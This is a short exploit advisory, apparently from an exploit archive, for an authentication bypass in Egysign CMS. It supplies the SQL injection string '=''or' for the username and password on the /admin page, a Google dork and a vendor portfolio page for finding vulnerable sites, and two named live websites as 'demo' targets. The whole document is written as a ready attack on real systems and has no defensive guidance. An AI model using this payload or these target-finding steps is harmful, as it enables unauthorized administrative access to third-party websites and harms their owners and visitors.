# Exploit Title : Egysign CMS Authentication Bypass
# Date : 02/04/2015
# Exploit Author : WH!T3 W01F
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Home : Iran-Cyber.Org - Iran-Cyber.In
# Google Dork : intext:powered By Egysign
# Tested On : Windows
1. Description
By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin.
2. Proof Of Concept
You Can Find Targets By 2 Ways :
First Way :
Go To This Address : http://egysign.com/Portfolio.aspx
In That Address Are Many Targets.After You Selected Your Target Use This Exploit :
# http://site.com/admin
Then If The Admin Page Comes,Use These Usernames And Passwords :
Username : '=''or'
Password : '=''or'
Second Way :
Search This Dork : intext:powered By Egysign
Then Use This Exploit :
# http://site.com/admin
Then If The Admin Page Comes,Use These Usernames And Passwords :
Username : '=''or'
Password : '=''or'
# Demo :
# http://diverprofessional.co.uk/admin/
# http://www.injazsys.com/admin/
=========================================
Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |
Visit Us :
Iran-Cyber.Org - Iran-Cyber.In